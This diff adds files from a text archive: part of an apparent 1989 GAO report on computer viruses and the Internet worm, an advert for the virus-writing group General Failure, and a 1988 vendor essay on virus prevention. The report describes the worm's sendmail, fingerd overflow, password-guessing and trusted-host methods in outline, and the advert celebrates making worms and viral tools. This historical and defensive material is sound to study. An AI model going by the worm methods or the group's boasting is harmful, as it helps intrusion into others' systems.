+and prosecutors may not have the background and training needed
+to deal with it proficiently.  Moreover, even if prosecutors are
+prepared to deal with the evidence, it is not likely that the
+court and jury would be similarly capable of assessing complex
+computer-related evidence.  Consequently, prosecutors would need
+to devote additional resources and effort in preparing to
+communicate the substance of the case.  This difficulty was
+described by the court in a 1985 software copyright case
+involving similar types of evidence:
+
+     "This fact-rich case has presented difficult issues for
+     resolution, particularly since the intellectual
+     property at issue is computer programming, a form not
+     readily comprehended by the uninitiated.  The challenge
+     to counsel to make comprehensible for the court the
+     esoterica of bytes and modules is daunting."**
+
+  ** Q-CO Industries, Inc. v. Hoffman, 625 F.Supp. 608,
+     610 (1985).
+
+     Another potential problem in prosecuting virus-type
+incidents is that pretrial discovery may be burdensome and raise
+problems regarding access to sensitive computer records or
+security systems.**  For example, in a recent Texas case
+involving a virus-type incident,*** the defense moved for access
+to the victim company's backup tapes containing confidential
+records.  The issue was ultimately resolved by giving the
+defendant access to the data over one weekend, with physical
+control of the tapes remaining in the company's hands.  However,
+it is possible that similar requests for access to computer files
+or even security systems could deter prosecution in future
+incidents.
+
+  ** The term "discovery" refers to pretrial legal procedures
+     that can be used by one party to obtain facts and
+     information from the other party in order to assist in
+     preparation for trial.
+
+ *** Texas v. Burleson, unreported.  Our discussion is
+     derived from an unpublished case summary prepared by the
+     Office of the Criminal District Attorney, Tarrant
+     County, Texas.
+
+PROPOSED LEGISLATION ON COMPUTER
+VIRUSES AND RELATED OFFENSES
+
+     Two bills have been introduced in the Congress dealing with
+computer viruses and related conduct.  These bills contain
+language addressing computer-virus type incidents.  In addition,
+they provide for a private right of action authorizing the
+injured party to sue for a violation.  Neither of the bills
+includes a forfeiture penalty.
+
+     The proposed Computer Virus Eradication Act of 1989 (H.R.
+55) adds a new provision to the Computer Fraud and Abuse Act of
+1986 prohibiting the introduction of commands or information into
+a computer program knowing that they may cause loss, expense, or
+risk to the health or welfare of the computer's users or to
+persons who rely on information contained in the computer
+program.  The bill also prohibits individuals from knowingly
+transferring a program containing such instructions in
+circumstances where the recipient is unaware of the program or
+its effects.  The bill provides for criminal penalties and fines
+and authorizes victims to sue for a violation of the statute.
+
+     The second bill, the Computer Protection Act of l989 
+(H.R. 287), prohibits the knowing and willful sabotage of the
+proper operation of a computer hardware system or associated
+software that results in loss of data, impaired computer
+operation, or tangible loss or harm to the computer's owner. 
+This bill also provides for criminal penalties and fines and
+authorizes the victim to sue for a violation of the statute.  
+     
+     In addition to these bills, which have been referred to the
+Judiciary Committee, Department of Justice officials said they
+are considering draft legislation to better address virus-type
+incidents.
+
+CONCLUSIONS
+
+     Federal laws are not specifically directed at virus-type
+incidents.  The law most relevant to such incidents is untested
+with respect to virus-type offenses and contains terms that are
+not defined.  To date, no federal computer virus-type cases have
+been tried.  In addition, the technical nature of computer virus-
+type incidents may hinder the prosecution of computer virus-type
+cases.  Legislation directed at computer virus-type incidents
+could eliminate the uncertainty regarding the applicability of
+current laws.  
+ 
+ 
+APPENDIX I
+
+                   HISTORY OF COMPUTER VIRUSES
+
+     Computer viruses and worms are generally described as
+programs that can infect, replicate, and spread among computer
+systems.**  The effects of viruses and worms have ranged from an
+unexpected message flashed on a computer's screen to destruction
+of valuable data and program files.  Although computer viruses
+are a relatively recent threat, there are many varieties or
+strains that may infect computer systems.  
+
+  ** Viruses are closely related to computer worms--they
+     both spread and reproduce and their effects can be
+     identical.  The primary distinction between the two
+     is that a worm is self-replicating and self-propagating,
+     while a virus requires (usually unwitting) human
+     assistance to propagate.  Virus propagation can occur
+     by sharing diskettes, forwarding mail messages, or
+     other means.
+
+VULNERABILITIES IN PC DESIGN AND
+USE HAVE BEEN EXPLOITED BY VIRUSES
+
+     Historically, most viruses have attacked personal computers
+rather than other systems, such as minicomputers, workstations,
+and mainframes.  A Defense official said that the principal
+reason for this is that the first generation of PCs, due to their
+hardware and systems software design, are intrinsically
+vulnerable.  For example:
+
+     --   Early generation PCs do not have the same hardware and
+          software capabilities for managing system resources
+          that workstations and larger scale systems do.  PCs
+          were originally intended to serve only one user, and 
+          limitations on user privileges were not incorporated
+          into PCs' accessing schemes.
+
+     --   Most PCs do not differentiate among users and,
+          therefore, every person who operates a PC has access to
+          all resources. 
+     --   With PCs, the programs that enable the computer to
+          operate are unprotected; they are stored on the same
+          hard disk as the operator's files and there are few
+          limitations on accessing program files.
+
+In addition, PCs are often used in offices, where access is not
+monitored or recorded.  Diskettes are shared among computer
+users, and networking is becoming common practice in
+organizations that use PCs.  These operating conditions enable
+virus-type programs to spread among computers with relative ease.
+
+     According to Defense agency officials, creating a PC virus
+requires only moderate programming skills and access to a PC. 
+These and other basic security weaknesses often make PC virus
+prevention, detection, and eradication difficult. 
+
+HOW VIRUSES SPREAD
+
+     Viruses are often spread among PCs by sharing infected
+computer diskettes, down-loading infected programs from
+electronic bulletin boards, or using infected software packages. 
+For example, viruses may spread when an infected diskette is
+loaded into a computer.  The virus may copy itself from the
+infected diskette onto the PC's hard disk.  When other diskettes
+are inserted into the infected machine, they also become
+infected.  These newly infected diskettes can then infect other
+computers that they come in contact with.  This cycle continues
+until the virus is detected and eliminated.  In the PC community,
+computers can be reinfected many times by the same virus and,
+even after viral attacks, may be left just as vulnerable as
+before.  Therefore, virus attacks in the PC community may last
+for months or years.  Recently, networks have also been used to
+transmit viruses among personal computers. 
+
+     Viruses and other similar programs can be designed to
+trigger a wide variety of actions.  For example, they can destroy
+files and hinder or stop computer operations.  Viruses may also
+be designed to remain dormant until certain conditions occur. 
+When the designated condition is met, the virus activates to
+achieve its intended purpose.  For example, some viruses have
+been reported to trigger an action on a specified day, such as
+Friday the 13th, or after being recopied a certain number of
+times.  Such threats can be difficult to address because they can
+create a false sense of security and hinder detection and
+recovery by infecting backup files.  Viruses can also have less
+severe consequences.  For example, they may create a message on
+the computer monitor, creating a nuisance and interrupting
+activities but not causing any damage. 
+
+EXAMPLES OF VIRUSES
+
+     Viruses are tailored to attack specific systems and spread
+in different ways.  Following are examples of well known PC
+viruses:
+
+     --   The 1986 "Pakistani Brain" virus was reportedly
+          implanted in software packages as a warning or threat
+          to those who recopy software.  It infected IBM PCs and
+          compatibles and copied itself onto diskettes that were
+          inserted into infected systems.  The virus contained
+          the message "Welcome to the dungeon.  Beware of this
+          VIRUS.  Contact us for vaccination."  The message also
+          included an address and phone number of the two
+          brothers in Pakistan who originally distributed the
+          software.
+
+     --   The "Scores" virus of 1987 attacked Macintosh PCs. 
+          This virus infected utility programs and then
+          transferred copies of itself onto program files located
+          on diskettes inserted into the infected machines.  The
+          Scores virus caused system slowdown and printing
+          problems.  
+
+     --   The "Lehigh" virus, discovered in 1987 at Lehigh
+          University, attacked IBM PCs and compatibles.  It
+          infected PC operating systems and copied itself onto
+          diskettes inserted into the machines.  It was
+          programmed to infect four disks and then to destroy the
+          computer's file system.  It reportedly infected several
+          hundred computers, many of which lost all the data on
+          their disks.  
+
+     The "Christmas Tree" virus of 1987 attacked IBM mainframes
+through an international network.  It used electronic mail
+services to send copies of itself to network users.  It displayed
+a holiday message on the receiver's screen and then mailed itself
+to others.  The virus spread like an electronic chain letter
+through many kinds of communication links, including satellites
+and ocean cables, reportedly infecting computers in over 130
+countries.  This virus caused both denial of services and system
+shutdowns.  
+
+     While there are many different kinds of computer viruses,
+there are also a number of commercial programs that can discover
+specific viruses through such methods as comparing storage
+requirements of an uninfected file with the actual storage space
+being occupied at any time by the file.  Software packages used
+to discover specific viruses already present in computers include
+"Disk Watcher," "Protec," and "Condom."**  However, according to
+Defense officials, because computer viruses are not recognizable
+based solely on their behavior or appearance, their detection
+cannot be completely assured.  Currently, NCSC is evaluating such
+packages.  In addition, officials said that because of the
+intrinsic vulnerabilities of most PCs, viruses can be written to
+circumvent most PC software security features.   
+
+  ** There are other software packages aimed at preventing
+     initial viral infections.
+
+THE INTERNET VIRUS
+
+     The Internet incident, in which a virus-type program
+attacked computers through computer networks, demonstrates the
+potential extent and swiftness of propagation of self-replicating
+programs over networks.  The Internet virus was the first to use
+several security weaknesses to propagate autonomously over a
+network.  It was designed to attack Sun-3 and VAX computer
+systems that used system software based on Berkeley Software
+Distribution UNIX.  It incorporated four primary attack methods
+to access thousands of computers connected by network
+communication lines.  Two attack methods relied on implementation
+errors in network utility programs, a third method gained system
+access by guessing passwords, and the last method exploited local
+network security assumptions to propagate within the local
+networks.  Because of the independent and flexible nature of its
+attack strategy, the Internet virus was able to affect many
+systems within a short period.**
+
+  ** PCs were not infected because they are not host
+     computers on the Internet.
+
+Infection Through Software Holes
+
+     The Internet depends on network utility programs, including
+remote login, file transfer, message handling, and user status
+reporting, to support communication between users.  However,
+software security holes in two utility programs, sendmail and
+fingerd, enabled the Internet virus to propagate over the
+networks.**
+
+  ** The Internet virus exploited implementation errors on
+     two utility programs that enable users to use network
+     services.  It did not attack or affect the computers'
+     operating systems -- the programs that control the
+     computer's operation and access to resources.
+
+     Sendmail is a utility program that implements the Internet's
+electronic mail services by interacting with remote sites
+according to a standard mail protocol.  The Internet virus used a
+weakness in sendmail involving a feature called "debug."  This
+optional debug feature was designed into the original software as
+a convenience to programmers who tested network operations. 
+According to Defense officials, the debug feature is not
+necessary for standard operations and should have been turned off
+in normal program distribution.  However, through an apparent
+oversight, it was left activated on some releases.  In those
+cases, the virus could exploit the debug command to send
+components of itself to remote hosts.  It reproduced itself
+repeatedly as the computer received the virus components and
+constructed and executed the code. 
+
+     Fingerd is a utility program that is intended to help remote
+users by providing public information about other network users. 
+For example, fingerd can be used to determine which users are
+logged on to a specific computer.  The program collects
+information from and delivers information to network users. 
+
+     The virus exploited a security flaw in fingerd's procedure
+to collect information from remote network locations.  In this
+instance, the virus sent more characters than fingerd had space
+to hold, thus overflowing the memory space allocated for storage
+of input parameters.  Once outside this storage space, the virus
+overwrote the original program with portions of the virus code
+and was able to assume control of fingerd.  Masquerading as
+fingerd and using fingerd's privileges, the virus could access,
+alter, or destroy any file that fingerd could.  However, the
+virus was not destructive.  It simply reproduced itself without
+damaging programs or data.
+
+Passwords 
+
+     The Internet virus also accessed systems by guessing user
+passwords.  Many of the Internet's host computers store passwords
+(in encrypted form) and users' names in public files, a situation
+the virus exploited.  The Internet virus encrypted potential
+passwords and compared them to the encrypted password stored in
+the computer's files.  If they matched, the virus was able to
+gain access, posing as a legitimate user.  It tried various
+passwords, including
+
+     -- the user's first or last name,
+
+     -- the last name spelled backwards, and
+
+     -- the user's name appended to itself.
+
+In addition, the virus contained a list of 432 potential
+passwords that it also encrypted and compared to the password
+file.  Examples of such passwords include algebra, beethoven,
+tiger, unicorn, and wizard.  The program also used words from the
+on-line dictionaries of the infected computers on the networks. 
+Finally, access was attempted without using a password.
+
+Trusted Host Features
+
+     Local area network managers can offer trusted host
+privileges to specific users on designated computers.  These
+features are useful if a user wants to access his or her account
+frequently from another location.  However, once the Internet
+virus infected computers on local area networks it was able to
+spread to other computers by exploiting these privileges.  It
+used the feature to identify computers that had additional
+accounts accessible through known names and passwords.  By using
+trusted host privileges, the virus was able to infect more
+Internet computers. 
+
+     The virus also used trusted host privileges to identify
+which machines on the local networks could be accessed from other
+machines.  The program was thus able to access many computers
+connected by the local networks.  A Defense official compared the
+access policy on many of the Internet's local networks to
+security in an office building.  For instance, in some buildings,
+visitors must pass through a security check at the entrance. 
+Once inside, not every door in the building is locked because it
+is presumed that occupants have already passed the initial
+security test when they entered the building.  The Internet virus
+took advantage of the local area network's assumption that it was
+a legitimate process and spread to other machines within the
+local network. 
+
+Internet Virus Recovery
+
+     The Internet virus was eradicated from most host computers
+within 48 hours after it appeared, primarily through the efforts
+of computer experts at university research institutions.  Patches
+were disseminated to sites to close the sendmail hole and fingerd
+holes.  Once these holes were closed, the Internet virus could
+not reinfect the same computers providing the virus was not still
+present in trusted host computers.**
+
+  ** According to a Defense official, many sites temporarily
+     discontinued use of trusted host features until they
+     were assured that the virus had been eradicated.
+ 
+
+APPENDIX II
+
+                   RESEARCH AIMED AT IMPROVING
+               COMPUTER AND OPEN NETWORK SECURITY
+
+     Although DARPA, NIST, and NCSC sponsor or conduct
+considerable computer security-related research, none of these
+agencies are doing research specifically aimed at computer
+viruses.**  According to NCSC officials, NCSC analysis of virus-
+type programs has been comparatively limited, with knowledge
+about such programs largely confined to simple examples drawn
+primarily from experiences with PC attacks and only recently
+extended toward large host and network examples.  These agencies
+are, however, engaged in research that is aimed at enhancing
+computer and network security and that is, to varying degrees,
+applicable to open network environments, such as the Internet.  
+
+  ** NCSC is, however, evaluating commercial antiviral PC
+     software packages.  According to an NCSC official, the
+     evaluation results will be distributed internally in
+     spring 1989.
+
+COMPUTER SECURITY CONCERNS INCLUDE RESTRICTING
+DATA ACCESS AND ENSURING DATA INTEGRITY
+
+     Computer and computer network security includes 
+
+     --   restricting data access to prevent disclosure of
+          classified or sensitive information to unauthorized
+          users and 
+
+     --   ensuring data integrity to protect data from
+          unauthorized or accidental change or destruction.  
+
+     A number of Internet users said that the government--
+particularly the Defense Department--has traditionally been more
+concerned about restricting data access than ensuring data
+integrity.  For example, NCSC developed the "orange" and "red"
+books to describe computer systems that provide different degrees
+of access control.**
+
+  ** NCSC's "Trusted Computer System Evaluation Criteria",
+     commonly referred to as the "orange book," describes
+     criteria for evaluating computer security.  These
+     criteria describe the technical characteristics of a
+     secure stand-alone compute system.  The "Trusted Network
+     Evaluatin Criteria," referred to as the "red book,"
+     describes criteria for evaluating network security.
+
+     Current systems that meet stringent security requirements do
+so through physical isolation and providing access only to
+authorized individuals.  To meet such requirements, sacrifices
+must be made in system function, performance, and cost, which are
+often unacceptable in an open network environment.  
+
+OVERVIEW OF SOME RESEARCH AND
+PROJECTS THAT MAY IMPROVE SECURITY
+
+     The challenge in security research is to develop ways to
+increase security while minimizing the dollar, convenience, and
+performance costs associated with such security measures. 
+Internet users, network sponsors, and vendors cited the following
+examples of research and methods that may improve computer and
+network security.  These include (1) cryptographic methods and
+technology to permit users to send messages that can be
+understood (decrypted) only by the intended recipient, (2)
+improving controls on routing messages over the Internet, and (3)
+improving operating system quality to decrease program flaws and
+other security vulnerabilities.
+
+Cryptographic Methods
+
+     Cryptography--the science of coding information to restrict
+its use to authorized users--can help ensure data integrity and
+confidentiality.  NIST has designated one cryptographic approach,
+the Data Encryption Standard, as a Federal Information Processing
+Standard.  This method involves a symmetric algorithm, which
+means the same "key" is used to both code and decipher data.** 
+Research and development have produced advances in using
+cryptographic methods in such areas as public-key encryption,
+Kerberos authentication system, and portable access devices.  
+
+  ** An algorithm is the set of rules that describes the
+     encryption process.
+
+     Public-key Encryption
+
+     Unlike symmetric key systems, public-key encryption systems
+use two different keys for encrypting and decrypting data.  Each
+user has a secret key and a public one.  A sender uses the
+recipient's public key to send a message, and the recipient uses
+a private key to decode it.  Since only the recipient holds the
+secret key, the message can be communicated confidentially.  If
+the message is intercepted, or routed incorrectly, it cannot be
+decrypted and read.  In addition, the message can carry
+additional information that assures the recipient of the sender's
+identity.
+     
+     One method of implementing a public-key encryption system is
+based on a mathematical algorithm, developed by R. Rivest, A.
+Shamir, and L. Adleman at MIT, called the RSA algorithm.  This
+algorithm is based on the mathematical difficulty of deriving
+prime factors.**  Given an integer of more than 100 digits in
+length, it is very difficult to calculate its prime factors.  
+
+  ** A prime number can be divided only by itself and the
+     number 1, without leaving a remainder.
+
+     Recently, the Internet Activities Board proposed standards
+based on a combination of the RSA algorithm and NIST's Data
+Encryption Standard.  The proposed standards describe a hybrid 
+cryptographic system intended to enhance the privacy of
+electronic messages exchanged on the Internet and to authenticate
+the sender's identity.  The hybrid system uses symmetric
+cryptography to encrypt the message and public-key cryptography
+to transmit the key.
+
+     Each Internet user who uses the RSA algorithm will also
+receive an electronic certificate, electronically signed by a
+trusted authority.  A computer security expert compared the
+certificate to a driver's license issued by the Department of
+Motor Vehicles.  In the latter case, the Motor Vehicles
+Department is the trusted authority providing assurance to
+whomever checks the license.  An Internet Activities Board
+official stated that this service should be available in late
+1989.  
+
+     Kerberos Authentication System
+
+     "Kerberos"** is a cryptographic-based challenged response
+system used at MIT to authenticate users and host computers.  
+According to an MIT researcher, the system is intended to allow
+any two machines on a network to conduct secure and trusted
+communications, even when the network is known to be penetrated
+by intruders and neither machine has any intrinsic reason to
+trust the other.  This system maintains passwords in a single
+secure host called a key-server.  Because passwords are only
+present inside this key-server, the system is less vulnerable
+than if passwords were passed over the network.  Individual
+machines make use of the key-server to authenticate users and
+host computers.  Other groups, such as Berkeley's Computer
+Systems Research Group and Sun Microsystems, are also considering
+implementing this system to strengthen security.  
+
+  ** Also Cerberos -- in Greek mythology, the name of the
+     three-headed dog who guarded the entrance to the
+     underworld.
+
+     Portable Access Control Devices
+
+     One small credit-sized device--called a "smart card"--uses
+cryptographic technology to control access to computers and
+computer networks.  A smart card contains one or more integrated
+circuit chips, constituting a microprocessor, memory, and
+input/output interface.  The card manages, stores, receives, and
+transmits information.  
+
+     Each smart card has its own personal identifier known only
+to the user and its own stored and encrypted password.  When the
+user inserts the smart card into the reader/writer device, the
+terminal displays a message that identifies the smart card's
+owner.  The user then enters the personal identifier.  Once the
+identifier is authenticated, the host computer allows the user
+access.  The smart card contains information that identifies what
+level of access the user is allowed.  The smart card also
+maintains its own user audit trail.  
+
+     According to a NIST official, smart cards are not currently
+in widespread use.  This official stated, however, that a major
+credit card company is currently testing smart cards.  In
+addition, the Belgian banking industry is testing smart card
+technology for use in electronic funds transfers, and NIST is
+testing smart card technology for the U.S. Department of the
+Treasury.  Potential applications of smart card technology for
+the Treasury Department include authenticating disbursement
+requests from other federal agencies.  
+
+     According to researchers, other portable access control
+devices are currently available.  For example, one device--also a
+small-sized card--periodically displays changing encrypted values
+based on the time of day.  A user enters the value displayed by
+the card to gain access to the host computer.  Each card contains
+a unique encryption key.  Because the host computer knows the
+time of day and can decipher the value displayed on the card, the
+host computer can authenticate a user.  
+
+     Another small authentication device is available that
+contains a display screen and a small keyboard.  When a user
+requests access to a host computer system, the host computer
+sends an encrypted challenge to the remote terminal.  The user
+enters the challenge in the portable device and obtains an
+encrypted response to send to the host computer.  If the user's
+response is correct, the host computer allows the user access. 
+The advantage of these devices over smart cards is that no
+reader/writer device is required.
+
+Improved Controls in Message Routing
+
+     Messages exchanged on the Internet travel through a series
+of networks connected by electronic switching units or
+"gateways."  Messages are transmitted piecemeal in separate data
+groupings or "packets."  Each packet contains address
+information, which a gateway reads to route the packet to its
+destination.  Gateways also decide which paths to use.  For
+example, a gateway can decide which path can route the data
+packet to its destination most quickly.  
+
+     The message-switching technology incorporated on the
+Internet is very sophisticated.  Although Internet uses advanced
+technology, Internet users have limited control over message
+routing.  Data may travel through several different networks on
+the way to their ultimate destination.  However, a user cannot
+easily indicate his routing preferences to the Internet.  For
+example, he cannot practically specify that his packets not be
+routed over a particular network, nor can a network sponsor
+practically specify that only packets of certain Internet users
+be allowed to traverse that network. 
+
+     Research into a method called policy-based routing is
+currently underway that would allow Internet users the option of
+selecting their own communications paths by specifying certain
+parameters.  Network sponsors could enforce their own individual
+network policies, perhaps by restricting their network resources
+to a certain class of users.  Policy-based routing gives network
+users and owners some control over the particular routes data may
+take.  For example, data packets that belong to the Defense
+Department could be routed using its network resources.
+
+     According to researchers, some of the technology needed for
+policy-based routing is not very complicated.  Technology exists
+that can sort traffic into categories and route it through
+selected networks.  However, labeling individual data packets
+with the necessary policy-based routing information is difficult. 
+In particular, it is difficult to determine what information
+should be included on labels.  
+
+Improvements in Operating System Quality
+
+     Other researchers are attempting to improve operating system
+quality by decreasing program flaws and other security
+vulnerabilities.  For example, DARPA is sponsoring formal methods
+projects for the development of high quality assurance software
+systems.  These techniques will be applied to operating systems. 
+
+
+     The formal methods techniques involve using mathematically
+precise specifications statements for critical program
+properties, such as safety and security.  Using these
+specifications, it may be possible to ensure, by using a chain of
+mathematical proofs, that a program will operate as intended, and
+not in any other way.  According to a DARPA official, unlike past
+approaches, current efforts focus on achieving assurance of
+quality during the design stage rather than attempting to apply
+techniques to already existing systems.  The official noted that
+although the formal methods project is in the relatively early
+stages of research, the techniques are already being applied on a
+small scale in applications where very high levels of assurance
+are required.  The official said that there is significant
+progress in Europe in this area, particularly in the United
+Kingdom.
+ 
+
+APPENDIX III
+
+                MAJOR CONTRIBUTORS TO THIS REPORT
+
+
+INFORMATION MANAGEMENT AND TECHNOLOGY DIVISION, WASHINGTON, D.C
+
+Jack L. Brock, Jr., Director of Government Information and      
+     Financial Management, (202) 275-3195
+Glen Trochelman, Assistant Director
+Jerilynn B. Hoy, Evaluator-in-Charge
+Mary T. Brewer, Evaluator
+Beverly A. Peterson, Evaluator
+Gwendolyn Dittmer, Evaluator
+
+OFFICE OF THE GENERAL COUNSEL, WASHINGTON, D.C.
+ 
+John Carter, Attorney/Advisor
+
+BOSTON REGIONAL OFFICE
+
+Jeffrey Appel, Site Senior
+Debra Braskett, Evaluator
+
+SAN FRANCISCO REGIONAL OFFICE
+
+Don Porteous, Evaluator
+
+
+(510351)
+
+
+
+
+
+
+
+
+
+
diff --git a/textfiles.com/virus/gf.txt b/textfiles.com/virus/gf.txt
new file mode 100644
index 00000000..7ac7e47e
--- /dev/null
+++ b/textfiles.com/virus/gf.txt
@@ -0,0 +1,69 @@
+
+
+    �������� ��������  ����� �� ��������  �������� ������� ��
+    ��       �������   �� �� �� �������   �������� ������� ��
+    ��  ���� ��        �� �� �� ��        ��   ��  �    �� ��
+    �������� ��������  �� ����� ��������  ��   ��� �     � �������
+ 
+       �������� ������� �� ��      ��    �� �������� ��������
+       �������  ������� �� ��      ��    �� �������� �������
+       ��       �    �� �� ��      ��    �� ��   ��  ��
+       ��       �     � �� ������� �������� ��   ��� ��������
+
+
+            An H/P/A/V/C Oriented Computer Organization
+            �������������������������������������������
+
+
+ We, at General Failure, specialize in making computer activities
+ a lot more exciting, by creating phunky worms, eliminating  lame
+         boards, programming weird viral tools, etc.
+
+
+
+                   General Failure Members
+                   �����������������������
+
+            Alex; Ara�a; Billy; George; Herbais; 
+            JM; Oro; Pablito ; Pipa; Walt DiZnEy
+
+
+
+
+      General Failure Can Be Reached At These Kool Boards
+      ���������������������������������������������������
+
+            
+                  --   Endless Riddance   --
+                  Everyday, From 11Pm To 7Am.
+            Phone Number:  (Confidential, By Now)
+
+
+ 
+                      --  No Future --
+             Mondays To Fridays, From 11Pm To 7Am.
+                 Phone Number:  541-923-1876
+            ** An Official GF Distribution Site **
+
+
+
+                    --  Perpetual XTC  --
+                 Everyday, From 11Pm To 7Am.
+                 Phone Number:  541-827-2511
+            ** An Official GF Distribution Site **
+
+
+                  
+                     --  Satanic Brain  --
+                     Everyday, 24hs A Day!
+                  Phone Number: 541-383-7480
+            ** Official NuKE International Site **
+
+
+
+
+
+
+                Check Out For Our New Releases!
+
+
\ No newline at end of file
diff --git a/textfiles.com/virus/glath.vir b/textfiles.com/virus/glath.vir
new file mode 100644
index 00000000..e0aa0cf0
--- /dev/null
+++ b/textfiles.com/virus/glath.vir
@@ -0,0 +1,552 @@
+
+
+
+
+                COMPUTER VIRUSES: A RATIONAL VIEW
+
+                      by: Raymond M. Glath
+                            President
+
+                    RG Software Systems, Inc.
+                       2300 Computer Ave.
+                           Suite I-51
+                     Willow Grove, PA 19090
+                         (215) 659-5300
+
+
+April 14, 1988
+
+
+WHAT ARE COMPUTER VIRUSES?
+(a.k.a. Trojan Horses, Worms, Time Bombs, Sabotage)
+
+Any software that has been developed specifically for the purpose
+of interfering with a computer's normal operations.
+
+
+WHAT DO THEY DO?
+
+There are two major categories of viruses.
+
+Destructive viruses, that cause:
+
+     Massive destruction...
+          ie: Low level format  of disk(s),  whereby any programs
+               and data on the disk are not recoverable.
+
+     Partial destruction...
+          ie: Erasure or modification of a portion of a disk.
+
+     Selective destruction...
+          ie: Erasure  or modification  of specific files or file
+               groups.
+
+     Random havoc... The most insidious form of all.
+          ie: Randomly changing data on  disk  or  in  RAM during
+               normal program applications, or changing keystroke
+               values, or  data from  other input/output devices,
+               with the result being an inordinate amount of time
+               to discover and  repair  the  problem,  and damage
+               that may never be known about.
+
+Non-Destructive  viruses, intended  to cause  attention to the
+     author or to harass the end user.
+
+     a. Annoyances...
+          ie:  Displaying  a  message,  changing  display colors,
+               changing  keystroke  values  such as reversing the
+               effect of the Shift and Unshift keys, etc.
+
+
+WHAT IS THE IMPACT OF A VIRUS ATTACK BEYOND THE OBVIOUS?
+
+Lost productivity time !!!
+
+In addition to  the  time  and  skills  required  to re-construct
+damaged data files, viruses can waste a lot of time in many other
+ways.
+
+With either type of virus, the person subjected to the  attack as
+well as  many support  personnel from  the attacked site and from
+various  suppliers,  will  sacrifice  many  hours   of  otherwise
+productive time:
+
+     Time to determine the cause of the attack.
+     The removal of the virus code from the system.
+     The recovery of lost data.
+     The detective work required to locate the original source of
+          the virus code.
+
+     Then, there's the management time required to determine  how
+          this will be prevented in the future.
+
+
+WHO DEVELOPS VIRUSES?
+
+This individual, regardless of his specific motivation, will most
+probably want to see  some form  of publicity  resulting from his
+handiwork.  Anywhere  from  a  "Gotcha"  message appearing on the
+computer's screen after the  attack, to  major press  coverage of
+that particular virus' spread and wake of damage.
+
+Some of  the reasons for someone to spend their time developing a
+virus program are:
+
+     A practical joke.
+     A personal vendetta against a company or  another person.
+          ie: a disgruntled employee.
+     The computer-literate political terrorist.
+     Someone  trying  to  gain  publicity  for  some cause or
+          product.
+     The bored, un-noticed "genius," who wants attention.
+     The mentally disturbed sociopath.
+
+
+IS THE THREAT REAL?
+
+Yes, however thus far the destructive ones have primarily been in
+the Academic environment. Several attacks have been documented by
+the press, and, from first hand experience, I  can attest  to the
+fact that  those reported do exist. We have seen some of them and
+successfully tested our Disk Watcher product against them.
+
+Reputable individuals have reported additional viruses to us, but
+these have  not reached the scale of distribution achieved by the
+now  infamous  "Lehigh,"  "Brain,"   "Israeli,"  and  "MacIntosh"
+viruses.
+
+We do  expect the  situation to  worsen due to the attention it's
+received. Taking simple lessons  from history,  a new phenomenon,
+once  given  attention,  will  be  replicated  by individuals who
+otherwise have no opportunity for personal attention.
+
+Now that there are products for  defense from  viruses, the virus
+writers have  been given  a challenge;  and for  those people who
+have always wanted  to  anonymously  strike  out  at  someone but
+didn't know  of a  method to  do so,  the coverage has provided a
+"How To" guide.
+
+
+HOW DOES A VIRUS GET INTO YOUR COMPUTER SYSTEM?
+
+A virus may be entered into a system by an  unsuspecting user who
+has been  duped by the virus creator (Covert entry), or it may be
+entered directly by the creator. (Overt entry.)
+
+     Examples of Covert  entry  of  a  virus  into  a computer
+          system.
+
+          A  "carrier" program  such as  a "pirate" copy of a
+             commercial package that has been tampered with, is
+             utilized  by  the  un-suspecting  user,  and  thus
+             enters the virus code into the system.
+
+             Other types  of  carriers  could  be  programs from
+             Bulletin  Boards  that  have  been either tampered
+             with  or  specifically  designed  as  viruses, but
+             disguised as  useful programs. There has even been
+             a  destructive  virus   disguised   as   a  "virus
+             protection" program on a BBS.
+
+          The  user  unknowingly acquires an "infected" disk
+             and uses it to boot the system.
+
+             The virus has been hidden in  the system  files and
+             then hides  itself in  system RAM  or other system
+             files in order to reproduce, and later, attack.
+
+
+     Examples of Overt entry into a computer system.
+
+          An  individual  bent  on  harassing  the  user  or
+             sabotaging   the   computer  system,  modifies  an
+             existing program  on  that  computer  or  copies a
+             virus  program  onto  someone's  disk during their
+             absence from their work station.
+
+
+HOW DOES A VIRUS SPREAD?
+
+A virus may reproduce itself by delaying its attack until  it has
+made copies  of itself onto other disks (Active reproduction,) or
+it may depend entirely on unsuspecting users to make copies of it
+and pass  them around  (Passive reproduction).  It may also use a
+combination of these methods.
+
+
+WHAT TRIGGERS THE VIRUS ATTACK?
+
+Attacks begin upon the occurrence of a certain event, such as:
+
+     On a certain date.
+     At a certain time of day.
+     When a certain job is run.
+     After "cloning" itself n times.
+     When a certain combination of keystrokes occurs.
+     When the computer is restarted.
+
+One way or  another,  the  virus  code  must  put  itself  into a
+position to  either start  itself when the computer is turned on,
+or when a specific program is run.
+
+
+HOW DOES ONE DISTINGUISH A VIRUS FROM A "BUG" IN  A PROGRAM  OR A
+HARDWARE MALFUNCTION?
+
+This can  be a tough one. With the publicity surrounding viruses,
+many people are ready  to  believe  that  any  strange occurrence
+while computing  may have  been caused  by a virus, when it could
+simply be an operational error, hardware component failure,  or a
+software "bug."
+
+While  most  commercial  software  developers test their products
+exhaustively,  there  is  always   the   possibility   that  some
+combination of hardware; mix of installed TSR's; user actions; or
+slight incompatibilities with "compatible" or "clone" machines or
+components; can cause a problem to surface.
+
+We need to remember some key points here:
+
+1. Examine the probabilities of your having contacted a virus.
+
+2. Don't  just assume  that you've  been attacked  by a virus and
+     abandon  your  normal  troubleshooting  techniques  or those
+     recommended by the product manufacturers.
+
+3. When  in doubt  contact your  supplier or the manufacturer for
+     tech support.
+
+4. Having  an effective  "Virus Protection"  system installed may
+     help you determine the cause of the problem.
+
+
+HOW CAN YOU AVOID COMING IN CONTACT WITH VIRUSES?
+
+1.  Know  and  be  comfortable  with  the source of your software
+     acquisitions.
+
+     If you use a BBS (Bulletin Board,) verify that the BBS is
+        reputable  and  that  it has satisfactory procedures in
+        place to check out its software  as well  as provisions
+        to prevent that software from being modified.
+
+     Do not use illegitimate copies of software.
+
+     Be  sure that  the developer of the software you're using
+        is a professional. Note that many  "Shareware" products
+        are  professionally  produced.  You  needn't stop using
+        them. Just be sure that you  have a  legitimate copy of
+        the program if you choose to use these products.
+
+     Don't  accept  free  software  that looks too good to be
+        true.
+
+2.  Install  a  professional  virus  protection  package  on your
+     computer that will alert you to any strange goings on.
+
+3.  Provide physical security for your computers.
+     ie: Locked rooms; locks on the computers; etc.
+
+4.  If you're unsure of a disk or a specific program, run it in an
+     isolated environment  where it  will not  be able  to do any
+     damage.
+
